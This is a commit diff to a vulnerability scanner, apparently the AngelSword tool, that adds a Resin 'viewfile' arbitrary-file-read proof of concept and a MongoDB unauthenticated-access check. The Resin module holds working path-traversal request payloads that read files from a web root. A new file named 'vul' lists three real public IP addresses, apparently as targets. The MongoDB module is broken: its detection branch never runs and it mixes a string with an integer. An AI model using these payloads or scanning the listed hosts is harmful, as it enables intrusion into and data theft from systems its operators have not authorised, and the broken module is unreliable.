增加resin任意文件读取poc

.history

@@ -1,5 +1 @@
-1|iis_ms15034_httpsys_rce
-2|iis_webdav_rce
-3|intel_amt_crypt_bypass
-4|smtp_starttls_plaintext_inj
-5|juniper_netscreen_backdoor
+1|yonyou_test_sqli

AngelSword.py

@@ -2,6 +2,7 @@
 # -*- coding: utf-8 -*-
 import os
 import re
+import io 
 import sys
 import time
 import requests
@@ -17,7 +18,7 @@ from hardware.hardwaremain import *
 from multiprocessing import Pool
 from multiprocessing.dummy import Pool as ThreadPool
 warnings.filterwarnings("ignore")
-
+sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
 SEARCH_HISTORY = dict()
 
 #版本号
@@ -225,10 +226,10 @@ Usage: python3 AngelSword.py -u http://www.example.com 对url执行所有poc检
             print("|---------------------------------------------------------------------|")
         print("\r")
     elif sys.argv[1] == "-s" and sys.argv[2]:
-        keywords = sys.argv[2]
+        keywords = sys.argv[2].strip()
         count = 0
         cprint("搜索结果: ", "green")
-        with open("pocdb.py") as f:
+        with open("pocdb.py", "r", encoding='utf-8') as f:
             for line in f.readlines():
                 line = line.strip()
                 if line.find(keywords) is not -1:
@@ -259,11 +260,11 @@ Usage: python3 AngelSword.py -u http://www.example.com 对url执行所有poc检
         tmpdict = poc_class.hardwarepocdict.copy()
         alldict.update(tmpdict)
         for keyword in alldict.values():
-            if keyword.__str__().find(sys.argv[2]) is not -1:
+            if keyword.__str__().find(sys.argv[2].strip()) is not -1:
                 break
         cprint("[+] 加载poc: ["+keyword.__module__+"]", "green")
         statistic_count = 0
-        filepath = sys.argv[4]
+        filepath = sys.argv[4].strip()
         allcount = len(open(filepath,'rU').readlines())
         with open(filepath) as f:
             for line in f.readlines():
@@ -295,7 +296,7 @@ Usage: python3 AngelSword.py -u http://www.example.com 对url执行所有poc检
         tmpdict = poc_class.hardwarepocdict.copy()
         alldict.update(tmpdict)
         for keyword in alldict.values():
-            if keyword.__str__().find(sys.argv[2]) is not -1:
+            if keyword.__str__().find(sys.argv[2].strip()) is not -1:
                 break
         cprint(FLAGLET, "cyan")
         cprint("[+] 加载poc: ["+keyword.__module__+"]", "cyan")

pocdb.py

@@ -292,6 +292,7 @@ class pocdb_pocs:
             "深澜软件srun3000计费系统user_info.php命令执行":srun_user_info_uid_rce_BaseVerify(url),
             "intel AMT web系统绕过登录(CVE-2017-5689)":intel_amt_crypt_bypass_BaseVerify(url),
             "smtp starttls明文命令注入(CVE-2011-0411)":smtp_starttls_plaintext_inj_BaseVerify(url),
+            "resin viewfile 任意文件读取":resin_viewfile_fileread_BaseVerify(url),
         }
         self.hardwarepocdict = {
             "Dlink 本地文件包含":router_dlink_webproc_fileread_BaseVerify(url),

system/mongodb/mongodb_unauth.py

@@ -0,0 +1,43 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+'''
+name: mongodb 未授权漏洞
+referer: unknown
+author: Lucifer
+description: 开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作而且可以远程访问数据库！
+'''
+import sys
+import pymongo
+import warnings
+from termcolor import cprint
+from urllib.parse import urlparse
+
+class mongodb_unauth_BaseVerify:
+    def __init__(self, url):
+        self.url = url
+
+    def run(self):
+        if r"http" in self.url:
+            #提取host
+            host = urlparse(self.url)[1]
+            flag = host.find(":")
+            if flag != -1:
+                host = host[:flag]
+        else:
+            host = self.url
+
+        try:
+            port = 27017
+            mongo = pymongo.MongoClient(host, port)
+            print(mongo.server_info())
+            if False:
+                cprint("[+]存在mongodb 未授权漏洞...(高危)\tpayload: "+host+":"+port, "red")
+
+        except Exception as e:
+            print(e)
+            cprint("[-] "+__file__+"====>连接超时", "cyan")
+
+if __name__ == "__main__":
+    warnings.filterwarnings("ignore")
+    testVuln = mongodb_unauth_BaseVerify(sys.argv[1])
+    testVuln.run()

system/resin/resin_viewfile_fileread.py

@@ -0,0 +1,41 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+'''
+name: resin viewfile 任意文件读取
+referer: http://www.securityfocus.com/archive/1/434145
+author: Lucifer
+description: When resin-doc is installed on a system it is possible to read all files
+contained within the web root including class files which can then be
+decompiled to view the Java source。
+'''
+import sys
+import requests
+import warnings
+from termcolor import cprint
+
+class resin_viewfile_fileread_BaseVerify:
+    def __init__(self, url):
+        self.url = url
+
+    def run(self):
+        headers = {
+            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
+        }
+        payloads = ["/resin-doc/viewfile/?file=index.jsp", 
+                    "/resin-doc/viewfile/?contextpath=/.\../&servletpath=&file=index.jsp",
+                    "/resin-doc/viewfile/?contextpath=/.&servletpath=&file=index.jsp"]
+
+        try:
+            for payload in payloads:
+                vulnurl = self.url + payload
+                req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
+                if r"resin-doc" in req.text and r"caucho.server" in req.text:
+                    cprint("[+]存在resin viewfile 任意文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
+
+        except:
+            cprint("[-] "+__file__+"====>连接超时", "cyan")
+
+if __name__ == "__main__":
+    warnings.filterwarnings("ignore")
+    testVuln = resin_viewfile_fileread_BaseVerify(sys.argv[1])
+    testVuln.run()

system/systemmain.py

@@ -68,3 +68,6 @@ from system.intel.intel_amt_crypt_bypass import intel_amt_crypt_bypass_BaseVerif
 
 #smtp vulns
 from system.smtp.smtp_starttls_plaintext_inj import smtp_starttls_plaintext_inj_BaseVerify
+
+#resin vulns
+from system.resin.resin_viewfile_fileread import resin_viewfile_fileread_BaseVerify

vul

@@ -0,0 +1,3 @@
+http://139.199.154.121
+http://113.196.181.206
+http://122.141.224.190